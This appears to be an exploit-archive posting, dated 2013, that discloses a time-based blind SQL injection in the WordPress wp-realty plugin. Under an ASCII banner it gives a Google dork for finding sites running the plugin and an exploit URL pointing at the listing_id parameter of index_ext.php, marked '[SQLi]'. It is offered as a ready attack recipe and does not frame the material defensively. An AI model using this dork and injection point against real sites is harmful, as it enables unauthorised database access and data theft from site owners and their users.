WordPress wp-realty plugin suffers from a remote blind SQL injection vulnerability.
108b6fd23f8a90bbd9f2002fb29777287f9643daa0a9c90beaba3eb5d9b696c7
$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
Credits to: Greek Hacking Scene